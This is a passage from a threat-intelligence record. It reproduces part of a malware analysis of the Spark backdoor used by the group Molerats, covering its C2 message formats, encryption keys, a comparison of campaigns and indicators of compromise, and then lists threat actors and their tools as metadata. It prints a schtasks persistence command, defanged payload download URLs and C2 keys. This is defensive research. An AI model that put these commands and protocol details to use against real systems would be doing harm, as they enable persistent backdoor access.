following:\r\n{\"CallieVK\":\"eyJaZWtlIjpbeyJGcmVkZXJpY2tUIjoiNXlVdTE2QWU4V0t0aX\u003credacted\u003e0iLCJLYWlsZWVYd3MiOnRydWUsIlJlZXNlZlAiOjV9XX0\r\nThe payload will then encrypt this JSON object and send it to the C2 server to exfiltrate the results of the issued command.\r\nFigure 12 shows the HTTP POST request containing the encrypted JSON object that contains the “Winston” communication\r\ntype.\r\nFigure 12. Payload sending the results of the issued command to the C2 server\r\nAfter sending the results of the initial commands, the payload expects the C2 to reply with a JSON object with a “Garrison”\r\nfield set to a number, such as “{\"Garrison\" : 8}”. Figure 13 shows the C2 server responding with ciphertext of the JSON\r\nobject with the “Garrison” field.\r\nFigure 13. 
C2 server sending the Garrison JSON object to the payload\r\nThis concludes the check-in and initial command execution portion of the C2. The payload will enter a loop to continuously\r\nsend HTTP requests to obtain additional commands to run using the same sequence of JSON objects previously explained,\r\nstarting after the “JoslynKe” communication type that sent the system information to the C2. Instead of sending the system\r\ninformation to the C2 and parsing the response for a command, each iteration of this loop will start with a communication\r\ntype of “VanessaFM” as seen here:\r\n{\"CallieVK\":\"eyJBZGVsaW5lUkQiOiJ2Y0picTZuemdKaz0iLCJBdmVyaXp0IjoiMSIsIkJyYW5kZW50bEsiOjEsIk1hdGhpYXNOYm8iOlt7IkFkYWx5b\r\nThe data in the “CallieVK” field decodes to a JSON object that has several fields, one of which is an array called\r\n“MathiasNbo” that contains JSON objects that transmit the UUID for the compromised system in a field named\r\n“CollinsPM” that was previously transmitted to the C2 in the “ZaydenlnL” field of the “JoslynKe” communication type. The\r\nJSON object also contains a field “AdelineRD” that contains a nickname or campaign identifier value in the form of base64\r\nencoded ciphertext. We have compiled a list of campaign codes of known Spark payloads, which we have included in the\r\nAppendix. The resulting JSON object will look like the following:\r\n{\"AdelineRD\":\"vcJbq6nzgJk=\",\"Averizt\":\"1\",\"BrandentlK\":1,\"MathiasNbo\":[{\"AdalynngS\":1,\"CollinsPM\":\"\u003cbase64\r\nencoded ciphertext of UUID seen in ZaydenlnL field\u003e\",\"Nevaeh\":true}]}\r\nThis JSON is encrypted and base64 encoded and sent to the C2 server, as seen in Figure 14. 
The payload will use the same\r\nJSON each iteration of the main loop and will expect the C2 to provide the same sequence of responses as discussed before\r\nthat contain “Jordanlzw”, “Allier”, and “Garrison” fields to receive additional commands.\r\nFigure 14. Payload issuing HTTP POST to C2 server requesting further commands\r\nComparison between 2019 and 2020 campaigns\r\nWhile collecting additional Spark samples, we found samples from a 2019 campaign and newer samples that were compiled\r\nin January 2020 used in the Spark Campaign. The delivery documents and Spark payloads used in these campaigns differ\r\nfrom the delivery document we observed in the October and November 2019 attacks. At a high level, the January 2019\r\ndelivery document was self-contained as it had its payload embedded within it, while the October 2019, November 2019 and\r\nJanuary 2020 delivery documents required interacting with a remote server. The October 2019 and January 2020 documents\r\ndiffer as the former attempts to download a VBScript that downloads a payload from the actor controlled server, whereas the\r\nJanuary 2020 document attempts to load a remote template from Google Drive whose macro attempts to download a\r\npayload from Google Drive. The known Spark payloads installed by each of these delivery documents differ as well, which\r\nwe will compare with the known payload from the November attack discussed earlier in this blog.\r\nWe analyzed a delivery document from the 2019 campaign and found that it was a macro-enabled Word document\r\n(SHA256:40b7a1e8c00deb6d26f28bbdd3e9abe0a483873a4a530742bb65faace89ffd11). The macro made the decoy contents\r\nby setting a textbox in the document to visible with the line “Shapes(\"textbox1\").Visible = True”, while the attacks discussed\r\nearlier in this blog did not attempt to display any updated decoy contents. 
Another marked difference is that while both the\r\nJanuary and October 2019 delivery documents wrote to a secondary VBScript %userprofile%\\wmsetup.vbs and\r\nprogramdata\\Micorsoft\\Microsoft.vbs respectively, the wmsetup.vbs script contains the binary payload while Microsoft.vbs\r\nattempts to download another VBScript that will download the binary payload. The wmsetup.vbs script decodes an\r\nembedded base64 encoded payload (SHA256:9511940ed52775aef969fba004678f4c142b33e2dd631a0e8f4e536ab0b811db\r\n), saves it to %temp%\\ihelp.exe and creates a scheduled task for persistence by running the following command:\r\nschtasks /create /f /sc minute /mo 1 /tn ihelp /tr %temp%\\ihelp.exe\r\nA few notable characteristics of the Spark payload delivered in January 2019 include the use of different freely-available\r\nlibraries from other known samples, such as using the msgpackv1 library instead of JSON to structure its configuration and\r\nC2 communications, as well as using the SFML library instead of cURL. Also, unlike the Spark payload delivered in\r\nNovember 2019, this payload uses the AES cipher to decrypt its configuration and other pertinent strings and to encrypt and\r\ndecrypt network communications with its C2. It uses the entire SHA256 hash of a supplied key string without using the\r\ncustom rolling XOR cipher on the key and ciphertext as discussed earlier in this blog. The decrypted configuration from this\r\npayload structured using msgpack appears as follows:\r\n\\x88\\xa4jevG\\xadsmartweb9[.]com\\xa3JRk\\xa1/\\xa3ufRP\\xa4qNxp\\x00\\xa4kfds\\xa0\\xa4WjaS\\x01\\xa3WnF\\xb8OMfX5GiCmOICUvhunB2lWQ==\\xa3s\r\nWe also analyzed a delivery document from the 2020 Spark campaign\r\n(SHA256:8c0966c9518a7ec5bd1ed969222b2bcf9420295450b7ed2f45972e766d26ded8) and it differed from both the\r\nJanuary and October 2019 delivery documents. 
First, the initial delivery document did not contain a macro; rather, it attempts\r\nto load a remote template from Google Drive, specifically at the following URL:\r\nhxxps://drive.google.com/uc?export=download\u0026d=1NbCEnL-jA89PWBEhLWwHmBM5nmUKNRS8\r\nThe remote template (SHA256:a0ae5cc0659693e4c49d3597d5191923fcfb54040b9b5c8229e4c46b9330c367) contains a\r\nmacro that attempts to download an executable from the following URL:\r\nhxxs://drive.google.com/uc?export=download\u0026id=1yiDnuLRfQTBdak6S8gKnJLEzMk3yvepH\r\nThe executable hosted at the Google Drive link\r\n(SHA256:7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128) is a compiled AutoIt script that\r\nattempts to install a Spark backdoor to %userprofile%\\runawy.exe, which is the exact same dropper and payload as we\r\nobserved installed by the “attachment.doc” delivery document discussed earlier in this blog.\r\nTable 6 shows a comparison of features in the Spark payloads discussed in this section. Unfortunately, we were unable to\r\nobtain the payload installed by the MOFA-related Word documents delivered in the October 2019 attacks. If we compare the\r\nSpark samples installed by the delivery documents in January 2019 and 2020 with the Spark sample installed by the\r\nPictures.pdf delivery document in November 2019, we see notable differences that suggest this threat group is continually\r\ndeveloping this backdoor.\r\nFeature | Jan. 2019 Spark | Nov. 2019 Spark (Pictures.pdf) | Oct. and Nov. 2019 “attachment.doc” and Jan. 2020 “The Spark Campaign”\r\nDropper | None | Compiled AutoIt script | Compiled AutoIt script\r\nHTTP Library | SFML | cURL 7.56.0-DEV | elnormous' HTTPRequest\r\nConfiguration Structure | msgpack version 1 | JSON for Modern C++ v2.1.1 | JSON for Modern C++ v3.7.0\r\nPayload Packer | Enigma Virtual Box | Enigma (5.X) | Enigma (5.X)\r\nCipher used | AES on ciphertext | Rolling XOR on key and ciphertext + 3DES on ciphertext | Rolling XOR on key and ciphertext + custom AES decrypting 16-byte chunks of ciphertext\r\nEncrypted data | Configuration, Names for C2 comms, Commands to gather system information | Configuration, Names for C2 comms, Commands to gather system information | Configuration, Names for C2 comms\r\nPersistence | Scheduled task | LNK Shortcut in @StartupDir | Scheduled task, Copied executable in @StartupDir\r\nTable 6. Comparison of Spark payloads delivered in January 2019, October 2019, November 2019 and January 2020\r\nConnection to Downeks\r\nKaspersky’s report mentioned the sub-groups of Molerats (AKA the Gaza Cybergang) are responsible for the Operation\r\nParliament campaign that delivered the Spark payload, and we observed this threat group delivering Downeks in the\r\nDustySky campaign. We observed some similarities between Spark and Downeks from a development and installation\r\nperspective.\r\nFor instance, we observed the same binder Trojan, which is a malicious application used to open a decoy document and to\r\ninstall a payload, in three samples: one installing a Downeks payload and two others installing Spark. 
The binder Trojan installing Downeks\r\nwas compiled in December 2015 and was used during the DustySky campaign as mentioned in our blog (SHA256:\r\n75336b05443b94474434982fc53778d5e6e9e7fabaddae596af42a15fceb04e9), while we have two samples of this binder\r\nTrojan installing Spark samples that were compiled in November 2017\r\n(SHA256:4889318807225e51bae4d9d9a536e5775eaf92685b289eef6839f9d89f8c4b85) and April 2018\r\n(SHA256:23cf013ab91e6bd964c4d9a5d48c188a09838c32a75db68dd0690418f5ca7e7c).\r\nFrom a development perspective, both the Downeks and Spark payloads use libraries and code from several open-source\r\nprojects available on GitHub to carry out their C2 communications and to structure data in JSON. First, Spark uses the cURL\r\nlibrary for C2 communications, specifically version 7.56.0-DEV, whose source code is available on GitHub, while Downeks\r\n(SHA256:9347a47d63b29c96a4f39b201537d844e249ac50ded388d66f47adc4e0880c7) used cURL to communicate with the\r\nC2 server, but an earlier version (7.39.0). Second, Spark uses JSON to parse its configuration and to structure its\r\nmessages sent to and from the C2 server, for which it uses JSON for Modern C++ version 2.1.1, also available on GitHub. The\r\npreviously mentioned Downeks also used JSON to parse its configuration and to structure the data it sends and receives\r\nfrom its C2 server. However, it used Tencent’s RapidJSON, again freely available on GitHub. This fits our previous\r\nobservations of the developer of Spark using different JSON libraries within different versions of Spark.\r\nConclusion\r\nMolerats, also known as the Gaza Hacking Team and the Gaza Cybergang, has been targeting eight organizations in six\r\ndifferent countries in the government, telecommunications, insurance and retail industries from October 2019 through\r\nthe beginning of December 2019. 
This group uses spear-phishing emails to deliver both malicious Word and PDF\r\ndocuments, and attempts to social engineer the victim into an infection rather than trying to exploit a software vulnerability.\r\nAlso, the group uses the Spark backdoor in attacks, but continues to develop this tool using different freely available\r\nlibraries to structure important data and to carry out C2 communications.\r\nPalo Alto Networks customers are protected from the attacks discussed in this blog by:\r\nAll known Spark payloads and delivery documents have malicious verdicts in WildFire\r\nAll known Spark C2 domains and domains used in the delivery are marked with malicious classifications and\r\nverdicts in PANDB and DNS Security\r\nAutoFocus customers can track the delivery documents and payloads with the tags: Molerats_Spark\r\nAppendix\r\nIndicators of Compromise\r\nFiles related to MOFA documents\r\nd19104ef4f443e80c21375f1b779f00c960e0193e8aade69d7ad87a11f39c897 - MOFA- 031019.doc\r\ndc3311b3a827840c25689c0e153f2c09ba9583bcf18cdc43b88b12cf9846e94b - Microsoft.vbs\r\nc45b5b01e1c3284fd694db6aa0ebeab8abe78d9bb12eb41b957cd121d97b3516 - PlayerVLC.vbs\r\n03be1d7e1071b018d3fbc6496788fd7234b0bb6d3614bec5b482f3bf95aeb506 - MOFA- 061019.doc\r\n725d907b33cca8cec22f561068a3a8abf3616a8e2f452adb7fbd4aec20390f06 - Microsoft.vbs\r\nFiles related to Attachment.doc\r\neaf2ba0d78c0fda95f0cf53daac9a89d0434cf8df47fe831165b19b4e3568000 - attachment.doc\r\n7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128 - rundll64.exe\r\n64ea1f1e0352f3d1099fdbb089e7b066d3460993717f7490c2e71eff6122c431 - runawy.exe\r\nFiles related to Pictures.pdf\r\n9d6ce7c585609b8b23703617ef9d480c1cfe0f3bf6f57e178773823b8bf86495 - Pictures.pdf\r\n1742caf26d41641925d109caa5b4ebe30cda274077fbc68762109155d3e0b0da - Pictures.rar\r\n92d0c5f5ecffd3d3cfda6355817f4410b0daa3095f2445a8574e43d67cdca0b7 - الصور من قليلة عينة 
هذه.exe\r\n5139a334d5629c598325787fc43a2924d38d3c005bffd93afb7258a4a9a8d8b3 - pdf.exe\r\nRelated Spark payloads and Delivery documents\r\nee9f90819a578c8256fc950f62bd9f7b051edbee06618a26fa21c2875c3c301e - الج الحكومة قائمة 973 رقم المذكرة) Note No. 973\r\nGovernment List c)\r\n9451a110f75cbc3b66af5acb11a07a8d5e20e15e5487292722e695678272bca7 - GoogleChrome.vbs\r\nddf938508618ff7f147b3f7c2b706968cace33819e422fe1daae78bc256f75a8 - MOFA- 101019.doc\r\n4f51b180a6d0b074778d055580788dc33c9e1fd2e49f3c9a19793245a8671cba - Microsoft.vbs\r\nfeec28c7c19a8d0ebdca8fcfc0415ae79ef08362bd72304a99eeea55c8871e21 -  - 9 -ليوم الفلسطينية المستجدات أهم حول اليومي التقرير\r\n9 - 2019.doc (Daily report on the most important Palestinian developments, 9-9-2019.doc)\r\nbf126c2c8f7d4263c78f4b97857912a3c1e87c73fee3f18095d58ef5053f2959 - 9 - 9 -العالمي اإلرهاب مستجدات أخر حول اليومي التقرير\r\n2019 -.doc (Daily updates on the latest terrorism report Alaalmi- 9 - 9 - 2019.doc)\r\n243f1301d1d759c17cd49336512ebceb9d347995c90a6e00aff926439d63f12d - Daily Report.rar\r\nRelated Delivery Domains\r\nservicebios[.]com\r\ndapoerwedding[.]com\r\nzmartco[.]com\r\nSpark C2 Domains\r\nSpark First Names and More\r\nDecrypted String | Usage | Description\r\nLawrence | C2 Channel (from payload) | Key name in dictionary (JaseN) used to store the value of a task number provided in the Ivory field\r\nAllier | C2 Channel (from C2) | Key name used to store a number for an unknown purpose, but it is expected as a response to the MorganE communication type.\r\nJaseN | C2 Channel (from payload) | Key name for a list of dictionaries in the MorganE communication type, represents the received task numbers\r\nIvory | C2 Channel (from C2) | Key name in the Jordanlzw list used to store a number that we believe is a task number\r\nJonas | C2 Channel (from C2) | Key name in the Jordanlzw list used to store a boolean for an unknown reason\r\nReginacy | C2 Channel (from C2) | Key name in the Jordanlzw list used to store a boolean to not create the process, rather just send 'ok' back to C2\r\nTrumanRd | C2 Channel (from C2) | Key name in the Jordanlzw list used to store the command line arguments to run with an executable\r\nAlanih | C2 Channel (from C2) | Key name in the Jordanlzw list used to store the executable to run\r\nAverizt | C2 Channel (from payload) | Key name that stores a number in the VanessaFM communication type that is hardcoded within the binary.\r\nMathiasNbo | C2 Channel (from payload) | Key name for a list of dictionaries in the VanessaFM communication type\r\nBrandentlK | C2 Channel (from payload) | Key name that stores a number in the VanessaFM communication type that is hardcoded into the configuration.\r\nAdalynngS | C2 Channel (from payload) | Key name in dictionary (MathiasNbo) used to store a number with unknown purpose.\r\nAdelineRD | C2 Channel (from payload) | Key name that stores a base64 encoded encrypted string obtained from the payload configuration sent to the C2 in the VanessaFM communication type. Considered as a nickname or campaign/payload identifier.\r\nCollinsPM | C2 Channel (from payload) | Key name in dictionary (MathiasNbo) used to store the UUID also seen in the ZaydenlnL field\r\nNevaeh | C2 Channel (from payload) | Key name in dictionary (MathiasNbo) used to store a boolean with unknown purpose.\r\nLondonzO | C2 Channel (from C2) | Key name in the Jordanlzw list used to store a boolean to create a specified process and wait for return\r\nJoslynKe | C2 Channel (from payload) | Value in ReeceWNM field to represent the transmission of system information\r\nAngelxEv | C2 Channel (from payload) | Key name used in the system information dictionaries (Maximiliano) to store the information type value (1 = UUID, 2 = hostname, 3 = username)\r\nZaydenlnL | C2 Channel (from payload) | Key name used in the system information dictionaries (Maximiliano) to store the data associated with the type specified in AngelxEv\r\nHoustonod | C2 Channel (from payload) | Key name used in the system information dictionaries (Maximiliano) to store the value \"1\" whose purpose is unknown\r\nMaximiliano | C2 Channel (from payload) | Key name in JoslynKe communication type that stores a list of system information dictionaries\r\nGarrison | C2 Channel (from C2) | Key name for a number value used by the payload possibly as a sleep interval before sending results of additional commands.\r\nZeke | C2 Channel (from payload) | Key name for a list of dictionaries in the Winston communications type\r\nReesefP | C2 Channel (from payload) | Key name within a dictionary within the Zeke array used to represent the task number\r\nFrederickT | C2 Channel (from payload) | Key name within a dictionary within the Zeke array storing the results of the executed command for the task\r\nKaileeXws | C2 Channel (from payload) | Key name within a dictionary within the Zeke array storing the boolean if the execution was successful\r\nEverlyY | C2 Channel (from C2) | Key name for a number value used by the payload to idle for a specified number of seconds\r\nCallieVK | C2 Channel (from payload) | Field in JSON sent to C2, used to store the communicated data\r\nReeceWNM | C2 Channel (from payload) | Field in JSON sent to C2, used to store the communication type\r\nMorganE | C2 Channel (from payload) | Value in ReeceWNM field to represent the task number it’s about to send data regarding\r\nWinston | C2 Channel (from payload) | Value in ReeceWNM field to represent the transmission of command execution results\r\nJessicay | C2 Channel (from payload) | Value in ReeceWNM field to represent the beacon\r\nVanessaFM | C2 Channel (from payload) | Value in ReeceWNM field to represent the request for additional tasks\r\nrEA8GPZf4oIdOsjMxgFD | Key | Used to encrypt fields within JSON sent to C2, including system information gathered\r\nJordanlzw | C2 Channel (from C2) | Key name of a list of dictionaries that store commands to run\r\nAryana | C2 Channel (from C2) | Key name for a number value used to specify the number of commands to run that are stored in the Jordanlzw list\r\n24 | Config | Minimum sleep interval between messages sent to C2\r\n119 | Config | Minimum sleep interval between failed C2 beacons\r\nJvFLb8pHNywoGdhtjsc5 | Key | Used to encrypt C2 communications\r\nSpark Nicknames/Campaign Codes\r\nSHA256 | Compile Time | Nickname\r\n0631ed0995e21ec.. | 2017-03-27 2:46:06 | 28-10\r\n966ad6452793b15.. | 2017-05-24 6:15:04 | Nick name\r\n212aa6e3f236550.. | 2017-05-24 6:15:04 | Nick name\r\nab4e43b4e526d44.. | 2017-05-24 6:15:04 | Nick name\r\n36166db096ddb50.. | 2017-10-07 7:06:22 | bbb\r\nd010ef2b6664779.. | 2017-10-07 7:06:23 | 28-10\r\n194c236a3eed81f.. | 2017-10-22 7:03:45 | sss\r\nfc420a49b1e9e22.. | 2017-10-22 7:03:45 | sss\r\nbc9353adc58b983.. | 2017-10-22 7:03:45 | sss\r\n9d49020debdc6ab.. | 2017-10-22 7:03:45 | Nick name\r\n3a32c81ec609a54.. | 2017-10-22 7:03:45 | 3007\r\nc3e23a42dc49b03.. | 2017-10-22 7:03:45 | 50852\r\n8e5bf597948ea6a.. | 2017-10-22 7:03:45 | O\r\n151303254451271.. | 2017-10-22 7:03:45 | Nick name\r\n83750372d4e8c04.. | 2017-10-22 7:03:45 | 0204\r\n58376e763ef0ca9.. | 2017-10-22 7:03:45 | R\r\n1c43f8f68f7b8e4.. | 2017-10-22 7:03:45 | ood\r\nab2335ba3abe97a.. | 2017-10-22 7:03:45 | Nick name\r\na4c6aea61953d51.. | 2017-10-22 7:03:45 | Nick name\r\n329e9e98f08f3d6.. | 2017-10-22 7:03:45 | FUD\r\n78696cf4370817c.. | 2017-10-22 7:03:45 | Ben\r\nec0d30d2fdd301b.. | 2017-10-28 10:55:21 | 28-10\r\n9511940ed52775a.. | 2017-12-02 11:16:24 | \u003cblank\u003e\r\n5139a334d5629c5.. | 2019-09-16 10:00:45 | bnvcs\r\n89acce7cdd354a0.. | 2019-09-16 10:00:45 | Docx\r\nb654dd768912e09.. | 2019-09-16 10:00:45 | 2909\r\ndaa72ba2b9525d7.. | 2019-09-16 10:00:45 | PalCamp\r\n69df8e4bdc3fd69.. | 2019-09-16 10:00:45 | NewsMac\r\ncf32479ed30ae95.. | 2019-12-30 9:45:44 | 1401\r\n64ea1f1e0352f3d.. | 2020-01-12 10:57:50 | FS1-2020\r\n6e60f5c65299ee7.. | 2020-01-12 10:57:50 | 1801\r\nb08b8fddb9dd940.. | 2020-01-12 10:57:50 | FS1-2020\r\n04fa6aaea5e3a26.. | 2020-01-12 10:57:50 | up\r\nSource: https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/"
	],
	"report_names": [
		"molerats-delivers-spark-backdoor"
	],
	"threat_actors": [
		{
			"id": "acae6371-5530-498a-8b99-c2f55652ffd5",
			"created_at": "2022-10-25T16:07:23.980316Z",
			"updated_at": "2026-04-10T02:00:04.818728Z",
			"deleted_at": null,
			"main_name": "Operation Parliament",
			"aliases": [],
			"source_name": "ETDA:Operation Parliament",
			"tools": [
				"Remote CMD/PowerShell terminal"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a3687241-9876-477b-aa13-a7c368ffda58",
			"created_at": "2022-10-25T16:07:24.496902Z",
			"updated_at": "2026-04-10T02:00:05.010744Z",
			"deleted_at": null,
			"main_name": "Hacking Team",
			"aliases": [],
			"source_name": "ETDA:Hacking Team",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3bda9919-b9cd-451c-89e6-c7674f8c6257",
			"created_at": "2023-01-06T13:46:38.782181Z",
			"updated_at": "2026-04-10T02:00:03.097957Z",
			"deleted_at": null,
			"main_name": "Operation Parliament",
			"aliases": [],
			"source_name": "MISPGALAXY:Operation Parliament",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e90c06e4-e3e0-4f46-a3b5-17b84b31da62",
			"created_at": "2023-01-06T13:46:39.018236Z",
			"updated_at": "2026-04-10T02:00:03.183123Z",
			"deleted_at": null,
			"main_name": "Hacking Team",
			"aliases": [],
			"source_name": "MISPGALAXY:Hacking Team",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0c502f6d-640d-4e69-bfb8-328ba6540d4f",
			"created_at": "2022-10-25T15:50:23.756782Z",
			"updated_at": "2026-04-10T02:00:05.324924Z",
			"deleted_at": null,
			"main_name": "Molerats",
			"aliases": [
				"Molerats",
				"Operation Molerats",
				"Gaza Cybergang"
			],
			"source_name": "MITRE:Molerats",
			"tools": [
				"MoleNet",
				"DustySky",
				"DropBook",
				"SharpStage",
				"PoisonIvy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "6efb28db-4d91-46cb-8ab7-fe9e8449ccfc",
			"created_at": "2023-01-06T13:46:38.772861Z",
			"updated_at": "2026-04-10T02:00:03.095095Z",
			"deleted_at": null,
			"main_name": "DarkHydrus",
			"aliases": [
				"LazyMeerkat",
				"G0079",
				"Obscure Serpens"
			],
			"source_name": "MISPGALAXY:DarkHydrus",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5b04780e-7b64-4e62-b776-c6749ff7dec8",
			"created_at": "2022-10-25T16:07:23.531741Z",
			"updated_at": "2026-04-10T02:00:04.643562Z",
			"deleted_at": null,
			"main_name": "DarkHydrus",
			"aliases": [
				"ATK 77",
				"DarkHydrus",
				"G0079",
				"LazyMeerkat",
				"Obscure Serpens"
			],
			"source_name": "ETDA:DarkHydrus",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Mimikatz",
				"Phishery",
				"RogueRobin",
				"RogueRobinNET",
				"Trojan.Phisherly",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e5cad6bf-fa91-4128-ba0d-2bf3ff3c6c6b",
			"created_at": "2025-08-07T02:03:24.53077Z",
			"updated_at": "2026-04-10T02:00:03.680525Z",
			"deleted_at": null,
			"main_name": "ALUMINUM SARATOGA",
			"aliases": [
				"APT-C-23",
				"Arid Viper",
				"Desert Falcon",
				"Extreme Jackal ",
				"Gaza Cybergang",
				"Molerats ",
				"Operation DustySky ",
				"TA402"
			],
			"source_name": "Secureworks:ALUMINUM SARATOGA",
			"tools": [
				"BlackShades",
				"BrittleBush",
				"DarkComet",
				"LastConn",
				"Micropsia",
				"NimbleMamba",
				"PoisonIvy",
				"QuasarRAT",
				"XtremeRat"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "1162e0d4-b69c-423d-a4da-f3080d1d2b0c",
			"created_at": "2023-01-06T13:46:38.508262Z",
			"updated_at": "2026-04-10T02:00:03.006018Z",
			"deleted_at": null,
			"main_name": "Molerats",
			"aliases": [
				"Gaza Cybergang",
				"Operation Molerats",
				"Extreme Jackal",
				"ALUMINUM SARATOGA",
				"G0021",
				"BLACKSTEM",
				"Gaza Hackers Team",
				"Gaza cybergang"
			],
			"source_name": "MISPGALAXY:Molerats",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4fe925e8-95e5-4a63-9f96-4d0f9bedac08",
			"created_at": "2022-10-25T15:50:23.469077Z",
			"updated_at": "2026-04-10T02:00:05.384299Z",
			"deleted_at": null,
			"main_name": "DarkHydrus",
			"aliases": [
				"DarkHydrus"
			],
			"source_name": "MITRE:DarkHydrus",
			"tools": [
				"Mimikatz",
				"RogueRobin",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "847f600c-cf90-44c0-8b39-fb0d5adfcef4",
			"created_at": "2022-10-25T16:07:23.875541Z",
			"updated_at": "2026-04-10T02:00:04.768142Z",
			"deleted_at": null,
